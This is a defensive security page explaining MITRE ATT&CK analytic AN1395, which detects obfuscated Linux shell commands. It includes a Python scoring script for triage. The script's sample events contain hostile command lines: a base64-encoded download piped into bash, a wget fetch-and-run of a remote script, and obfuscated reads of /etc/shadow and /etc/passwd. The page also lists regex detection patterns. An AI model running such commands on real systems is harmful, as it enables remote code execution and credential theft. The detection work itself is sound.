AN1395: Analytic 1395
Detection of shell commands that leverage encoded execution, command chaining, excessive piping, or unusual token patterns indicative of obfuscation.
Analyst context for executives and security teams
This analytic is about spotting Linux shell command lines that look intentionally hard to read or review, such as encoded execution, long command chains, heavy use of pipes, or unusual token patterns. For leaders, the value is not that every complex command is malicious, but that obfuscated shell activity can hide unauthorized automation, intrusion activity, or risky administrative behavior from normal review and response workflows.
Executive priority
Prioritize this as a SOC and incident-response readiness question for Linux environments: do teams have enough command-line visibility to recognize suspicious obfuscation, investigate it quickly, and separate legitimate administrative scripts from activity that needs escalation? It is also relevant to audit and control evidence because detection depends on whether Linux process and command telemetry is actually collected, retained, searchable, and governed.
Technical view
Validate coverage for Linux command execution telemetry that includes full process command lines and parent-child process context. Because the ATT&CK object provides no formal detection logic and no tactic mapping, teams should treat AN1395 as a detection concept: identify shell commands using encoded execution, excessive command chaining, excessive piping, or unusual token patterns, then tune against known administrative scripts, deployment tooling, monitoring agents, and maintenance jobs. Investigation should focus on context: user account, parent process, working directory, execution frequency, host role, and whether the pattern is expected for that system.
Likely telemetry
- Linux process creation events with full command-line arguments
- Shell execution logs where available
- Parent-child process relationships for shell and utility execution
- User, host, timestamp, and working-directory context
- Script or automation execution records from Linux administration tooling
Detection direction
- Confirm command-line logging is enabled and captures enough detail to see encoded strings, pipes, chained operators, and unusual token patterns.
- Build or review analytics that score suspicious command structure rather than relying on a single token match.
- Tune false positives from legitimate shell scripts, package management, configuration management, backup jobs, monitoring agents, and developer workflows.
- Require triage context around the executing user, parent process, host role, and recurrence before escalating complex commands as suspicious.
- Document blind spots where endpoint logging truncates command lines, omits arguments, or excludes short-lived shell processes.
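The bullets above ask for analytics that score command structure rather than matching a single token, and for triage context before escalation. The following Python is an added example written for this page, not MITRE or Glexia code and not a supplied detection procedure for AN1395. It scores constructed command lines along the dimensions the analytic names (encoded execution, chaining, piping, token shape) and then applies parent-process context as a suppression step. The thresholds, weights, the allow-listed parent path and every sample event are assumptions for illustration and need tuning against a local baseline.

```python
"""Structural scoring of Linux shell command lines for obfuscation indicators.

Added example for AN1395. Thresholds, weights, the allow-list and the sample
events below are assumptions, not values taken from any real environment.
"""
import re
from dataclasses import dataclass, field

# Assumed tuning values; derive real ones from your own command-line baseline.
PIPE_THRESHOLD = 4     # single '|' count at or above this is "excessive piping"
CHAIN_THRESHOLD = 3    # '&&', '||', ';' count at or above this is "chaining"
ALERT_THRESHOLD = 2    # total score at or above this is escalated

# Decoders that turn an opaque blob back into bytes, interpreters that run them,
# eval over a substitution, and transform utilities that merely reshape data.
DECODER = re.compile(r"\b(base64|base32)\s+(-d|--decode)\b|\bxxd\s+-r\b|\bopenssl\s+enc\s+-d\b")
RUNNER = re.compile(r"\|\s*(sh|bash|dash|zsh|python3?|perl)\b")
EVAL_SUBST = re.compile(r"\beval\b.*(\$\(|`)")
TRANSFORM = re.compile(r"\b(base64|base32|xxd|rev|od)\b")

# Token-shape heuristics (weight, label, pattern); each fires at most once.
# The base64-like pattern will also fire on long hashes and tokens, which is a
# known false-positive source to tune locally.
ODD_TOKENS = [
    (2, "IFS substitution", re.compile(r"\$\{IFS\}")),
    (1, "hex escape", re.compile(r"\\x[0-9a-fA-F]{2}")),
    (1, "ANSI-C quoting", re.compile(r"\$'")),
    (1, "base64-like token", re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{24,}={0,2}")),
    (1, "backslash inside word", re.compile(r"(?<=\w)\\(?![xnrt0-7])\w")),
]


@dataclass
class Verdict:
    command: str
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points: int, reason: str) -> None:
        self.score += points
        self.reasons.append(reason)


def count_pipes(cmd: str) -> int:
    """Count single '|' characters; '||' is a control operator, not a pipe."""
    return cmd.count("|") - 2 * cmd.count("||")


def count_chain_ops(cmd: str) -> int:
    return len(re.findall(r"&&|\|\||;", cmd))


def score_command(cmd: str) -> Verdict:
    """Score one command line on structure, not on any single token."""
    v = Verdict(cmd)
    m = DECODER.search(cmd)
    if (m and RUNNER.search(cmd, m.end())) or EVAL_SUBST.search(cmd):
        v.add(3, "encoded execution")          # decoded bytes handed to an interpreter
    elif TRANSFORM.search(cmd):
        v.add(1, "encoding/transform utility")  # decoding alone is routine
    pipes = count_pipes(cmd)
    if pipes >= PIPE_THRESHOLD:
        v.add(2, f"excessive piping ({pipes})")
    chains = count_chain_ops(cmd)
    if chains >= CHAIN_THRESHOLD:
        v.add(1, f"command chaining ({chains})")
    for points, label, pattern in ODD_TOKENS:
        if pattern.search(cmd):
            v.add(points, label)
    return v


@dataclass
class Event:
    user: str
    parent: str    # parent process image, the context the triage bullets ask for
    command: str


# Assumed allow-list of approved automation parents; a real one comes from
# standardised admin scripting (see the mitigation bullets), not from guesswork.
APPROVED_PARENTS = {"/usr/lib/monitoring/collector.sh"}


def triage(event: Event, approved=APPROVED_PARENTS) -> dict:
    """Apply context: an approved parent suppresses structural noise but never encoded execution."""
    v = score_command(event.command)
    hard = "encoded execution" in v.reasons
    suppressed = event.parent in approved and not hard
    return {"user": event.user, "parent": event.parent, "score": v.score,
            "reasons": v.reasons, "escalate": v.score >= ALERT_THRESHOLD and not suppressed}


# Constructed sample events for a controlled test; none are from a real host.
SAMPLE_EVENTS = [
    Event("ops", "/bin/bash", "ls -la /var/log"),
    Event("ops", "/bin/bash", "ps aux | grep nginx | awk '{print $2}' | xargs kill -HUP"),
    Event("ops", "/bin/bash", "echo aGVsbG8= | base64 -d"),
    Event("www-data", "/usr/sbin/apache2",
          "echo 'Y3VybCBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3guc2ggfCBzaA==' | base64 -d | bash"),
    Event("www-data", "/usr/sbin/apache2",
          "cd /tmp && wget -q http://example.invalid/a.sh && chmod +x a.sh && ./a.sh; rm -f a.sh"),
    Event("www-data", "/usr/sbin/apache2", "eval $(printf '\\x63\\x61\\x74 /etc/shadow')"),
    Event("www-data", "/usr/sbin/apache2", "c${IFS}a${IFS}t /etc/passwd"),
    Event("nagios", "/usr/lib/monitoring/collector.sh",
          "df -P | awk 'NR>1 {print $5, $6}' | sort -rn | head -5 | sed 's/%//'"),
]


def run_samples(events=SAMPLE_EVENTS) -> list:
    return [triage(e) for e in events]


if __name__ == "__main__":
    for r in run_samples():
        flag = "ESCALATE" if r["escalate"] else "ok      "
        print(f"{flag} score={r['score']} user={r['user']} reasons={r['reasons']}")
```

The monitoring pipeline is the case the tuning bullet is about: it scores on piping alone, but an approved parent suppresses it, while the same command launched from a web server process would still be escalated. Note what the scorer deliberately does not do: it does not decode the blob, does not follow what the chained download would run, and treats plain `base64 -d` as routine; the score is a structural prompt for triage, and the user, parent, host role and recurrence checks in the bullets above remain the basis for escalation.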
Mitigation priorities
- Establish reliable Linux command-execution telemetry before depending on this analytic.
- Standardize administrative scripting practices so approved automation is identifiable and easier to suppress or allow-list safely.
- Limit unnecessary shell access and review privileged account usage where local policy supports it.
- Use incident-response playbooks that preserve process, user, host, and script context when obfuscated shell activity is detected.
- Periodically test whether detection content can see representative encoded, chained, piped, or token-heavy shell commands in a controlled environment.
Analyst notes and limits
AN1395 is a detection analytic, not a technique or mitigation. The supplied object only states that it applies to Linux and targets obfuscated-looking shell commands. No relationships, tactics, specific data sources, or detection procedure are supplied, so local engineering judgment is required to implement and tune it.
Official detection logic is not provided, and there are no supplied relationships or tactic mappings. This take does not assert active exploitation, attribution, impact, or guaranteed detection. Coverage depends on local Linux logging depth, command-line retention, parsing quality, and environment-specific baselining.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | af8482280ca4… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack AN1395 (source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.